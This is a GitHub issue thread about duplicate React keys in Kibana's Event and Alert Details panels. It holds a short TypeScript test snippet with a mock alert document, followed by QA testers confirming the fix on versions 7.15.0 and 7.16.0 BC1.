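export const HAS_DUPES_DOC: Json = { has_dupes: ['foo', 'bar', 'baz', 'foo'] };
export const ALERT_DOC: Json = {
  Events: [
    { process: { name: 'curl' }, user: { name: 'root' } },
    { process: { name: 'osascript' }, user: { name: 'root' } },
    { process: { name: 'curl' }, user: { name: 'root' } },
    { process: { name: 'osascript' }, user: { name: 'root' } },
  ],
  threat: [
    {
      technique: [
        { id: 'T1059', subtechnique: [{ id: 'T1059.007', name: 'JavaScript/JScript' }] },
      ],
    },
  ],
  user: { name: 'root' },
};

// Report for both documents and both key schemes.
for (const doc of [HAS_DUPES_DOC, ALERT_DOC]) {
  const rows = rowsFor(flattenSource(doc));
  console.log('key={value}:            ', JSON.stringify(keyCollisions(rows, keyByValue)));
  console.log('key={`${i}-${value}`}:  ', JSON.stringify(keyCollisions(rows, keyByIndexAndValue)));
}
```

Running it prints the collision report: under key={value} both has_dupes and Events.user.name (plus Events.process.name) collide, under the fixed scheme no row does, and the four root values remain in the Events.user.name row, which is the expected result because they are present in the source event rather than produced by rendering.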
@elasticmachine (Contributor):

Pinging @elastic/security-solution (Team: SecuritySolution)

@andrew-goldstein (Contributor, Author):

@MadameSheema, the previously theoretical discussion re: React keys in #115141 identified this as a potential issue and fixed it in #115141

Would the team be willing to:

  1. Reproduce this in a 7.15 deployment (if necessary, the raw event in the description above may be re-indexed)

  2. Upgrade the deployment to 7.16 BC1 to verify that #115141 (Improves the formatting of array values and JSON in the Event and Alert Details panels) fixed the issue

?

cc: @paulewing @michaelolo24 @ecezalp

@ghost commented Oct 25, 2021:

Hi @andrew-goldstein,

We have validated this ticket on 7.15.0 and 7.16.0 BC1 on-prem. Please find our observations below:

7.15.0 🔴

Threat Fields search with keyword threat
[screenshot]

Threat Fields search without the keyword threat
[screenshot]

Other Fields on search without the keyword _index
[screenshot]

Host.ip Fields on table tab and json
[screenshot]
[screenshot]

7.16.0 BC1

Build Details:

Version: 7.16.0 BC1
Build: 45504
COMMIT: 9231d806c9384df4026977ba7435a9302dc2d4ab

Threat Fields on Alerts Page ✔️
[screenshot]

Threat Fields on Hosts Page ✔️
[screenshot]

Threat Fields on Alerts Page search without the keyword threat ✔️
[screenshot]

Threat Fields on Hosts Page search without the keyword threat ✔️
[screenshot]

Other Fields on search without the keyword _index ✔️
Correct data is copied when Copy to clipboard
[screenshot]

Other Fields on search with the keyword _index ✔️
Correct data is copied when Copy to clipboard
[screenshot]

Host.ip Fields on table tab and json under Alerts Page ✔️
[screenshot]
[screenshot]

Host.ip Fields on table tab and json under Hosts Page ✔️
[screenshot]
[screenshot]

Observation in dev tools:
[screenshot]

Note:

7.16.0 BC1 cloud production build is not available yet, we will perform the upgrade scenarios once the cloud build is available.

Please let us know if we are missing something.

Thanks!!

cc: @MadameSheema

@ghost commented Oct 26, 2021:

Hi @andrew-goldstein,

We have validated this ticket after upgrading 7.15.0 to 7.16 BC1. Please find our observations below:

After upgrade to 7.16.0 BC1

Build Details:

Version: 7.16.0 BC1
Build: 45504
COMMIT: 9231d806c9384df4026977ba7435a9302dc2d4ab

Threat Fields on Alerts Page ✔️
[screenshot]

Threat Fields on Hosts Page ✔️
[screenshot]

Other Fields on search with the keyword _index ✔️
Correct data is copied when Copy to clipboard
[screenshot]

Host.ip Fields on table tab and json under Alerts Page ✔️
[screenshot]
[screenshot]

Host.ip Fields on table tab and json under Hosts Page ✔️
[screenshot]
[screenshot]

Kindly let us know if anything else is required from our end; otherwise we are good to close this issue.

Thanks!!

cc: @MadameSheema

@MadameSheema (Member):

@andrew-goldstein can you please take a look at the above? Thanks :)

@andrew-goldstein (Contributor, Author):

Thanks @deepikakeshav-qasource for verifying that upgrading to 7.16.0 BC1 fixes the issue, and for the screenshots above!
